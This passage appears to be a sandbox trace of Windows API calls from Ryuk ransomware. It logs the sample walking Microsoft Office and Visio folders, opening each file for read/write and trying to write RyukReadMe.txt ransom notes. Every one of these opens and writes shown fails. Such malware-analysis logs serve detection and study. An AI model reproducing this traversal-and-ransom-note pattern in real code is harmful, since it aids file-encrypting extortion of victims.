lpFindFileData=0x29ad240) returned 1 [0137.842] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.842] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.842] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.842] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.842] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.842] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.842] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.842] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.842] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.842] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.842] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.842] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.843] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.843] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\VBLZ0007.TLL", dwFileAttributes=0x80) returned 0 [0137.843] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\VBLZ0007.TLL" (normalized: "c:\\program files\\microsoft office\\office14\\vblz0007.tll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.843] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.843] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.843] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.843] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.843] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\VBLZ0009.TLL", dwFileAttributes=0x80) returned 0 [0137.843] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\VBLZ0009.TLL" (normalized: "c:\\program files\\microsoft office\\office14\\vblz0009.tll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.843] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.843] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.844] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.844] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.844] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\VBLZ000C.TLL", dwFileAttributes=0x80) returned 0 [0137.844] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\VBLZ000C.TLL" (normalized: "c:\\program files\\microsoft office\\office14\\vblz000c.tll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.844] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.844] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.844] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.844] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.844] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\VBLZ0011.TLL", dwFileAttributes=0x80) returned 0 [0137.844] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\VBLZ0011.TLL" (normalized: "c:\\program files\\microsoft office\\office14\\vblz0011.tll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.845] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.845] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.845] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.845] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.845] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\VBS2EXCL.XSL", dwFileAttributes=0x80) returned 0 [0137.845] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\VBS2EXCL.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\vbs2excl.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.845] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.845] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.845] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.845] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.846] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\VBS2WORD.XSL", dwFileAttributes=0x80) returned 0 [0137.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\VBS2WORD.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\vbs2word.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.846] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.846] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.846] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.846] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.846] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.846] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.846] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.846] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.846] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.846] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.846] SetLastError (dwErrCode=0x0) [0137.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.846] GetLastError () returned 0x5 [0137.846] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.846] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.846] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2d00 [0137.847] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.847] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.847] SetLastError (dwErrCode=0x0) [0137.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.847] GetLastError () returned 0x5 [0137.847] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.847] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.847] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2d60 [0137.849] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.850] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.850] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.850] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ACTDIR_M.VST", dwFileAttributes=0x80) returned 0 [0137.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ACTDIR_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\actdir_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.850] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.850] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.850] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.850] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.850] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ACTDIR_U.VST", dwFileAttributes=0x80) returned 0 [0137.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ACTDIR_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\actdir_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.851] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.851] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.851] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.851] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.851] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ADO_M.VSS", dwFileAttributes=0x80) returned 0 [0137.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ADO_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\ado_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.851] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.851] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.851] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.851] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.852] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ADO_U.VSS", dwFileAttributes=0x80) returned 0 [0137.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ADO_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\ado_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.852] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.852] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.852] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.852] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.852] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ADS_M.VSS", dwFileAttributes=0x80) returned 0 [0137.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ADS_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\ads_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.852] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.852] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.852] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.853] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.853] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ADS_U.VSS", dwFileAttributes=0x80) returned 0 [0137.853] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ADS_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\ads_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.853] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.853] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.853] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.853] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.853] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ALARM_M.VSS", dwFileAttributes=0x80) returned 0 [0137.853] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ALARM_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\alarm_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.853] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.853] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.854] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.854] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.854] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ALARM_U.VSS", dwFileAttributes=0x80) returned 0 [0137.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ALARM_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\alarm_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.854] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.854] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.854] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.854] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.854] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ANNOT_M.VSS", dwFileAttributes=0x80) returned 0 [0137.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ANNOT_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\annot_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.855] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.855] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.855] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.855] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.855] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ANNOT_U.VSS", dwFileAttributes=0x80) returned 0 [0137.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ANNOT_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\annot_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.856] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.856] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.856] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.856] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.856] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\APPL_M.VSS", dwFileAttributes=0x80) returned 0 [0137.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\APPL_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\appl_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.856] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.856] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.856] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.856] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.857] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\APPL_U.VSS", dwFileAttributes=0x80) returned 0 [0137.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\APPL_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\appl_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.857] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.857] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.857] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.857] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.857] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ARROWS_M.VSS", dwFileAttributes=0x80) returned 0 [0137.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ARROWS_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\arrows_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.857] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.857] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.857] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.857] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.858] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ARROWS_U.VSS", dwFileAttributes=0x80) returned 0 [0137.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ARROWS_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\arrows_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.858] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.858] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.858] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.858] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.858] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ASTMGT.XLS", dwFileAttributes=0x80) returned 0 [0137.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ASTMGT.XLS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\astmgt.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.859] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.859] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.859] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.859] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.859] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ASTMGT_M.VST", dwFileAttributes=0x80) returned 0 [0137.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ASTMGT_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\astmgt_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.860] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.860] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.860] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.860] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.860] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ASTMGT_U.VST", dwFileAttributes=0x80) returned 0 [0137.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ASTMGT_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\astmgt_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.860] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.860] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.860] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.860] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\AUDIT_M.VSS", dwFileAttributes=0x80) returned 0 [0137.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\AUDIT_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\audit_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.861] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.861] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.861] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.861] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\AUDIT_M.VST", dwFileAttributes=0x80) returned 0 [0137.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\AUDIT_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\audit_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 